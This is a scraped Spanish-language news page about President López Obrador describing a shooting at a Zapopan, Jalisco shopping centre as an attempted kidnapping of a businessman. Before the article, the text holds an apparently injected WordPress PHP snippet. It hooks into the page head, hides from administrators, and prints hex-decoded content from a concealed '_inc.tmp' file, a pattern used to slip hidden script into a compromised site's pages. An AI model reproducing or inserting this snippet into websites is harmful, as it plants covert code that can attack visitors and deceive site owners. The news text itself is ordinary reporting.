if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Balacera en Jalisco fue por intento de secuestro a empresario: AMLO – Reporte Noreste
Conéctate con nosotros

Nal / Int

Balacera en Jalisco fue por intento de secuestro a empresario: AMLO

Balacera en Jalisco fue por intento de secuestro a empresario: AMLO

Este mañana en conferencia de prensa el presidente Andrés Manuel López Obrador lamentó la balacera ocurrida en el centro comercial de Zapopan Jalisco, informando que este fue un intento de secuestro hacia un empresario.

El presidente señaló que según el informe preliminar se intentaba secuestrar a una persona y los escoltas del empresario se enfrentaron el grupo que lo quería secuestrar comenzando la balacera.

«Según el informe preliminar querían secuestrar a una persona y los escoltas del señor se enfrentaron a un grupo que lo quería secuestrar y empezó una balacera e intervino el ejército porque avisaron».

Por su parte el gobernador de Jalisco Enrique Alfaro informó a través de sus redes sociales que una persona había fallecido y dos más presuntos causantes habían resultado heridos estos fueron puestos a disposición de las autoridades del ministerio público informando además de otros 4 civiles heridos.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Nal / Int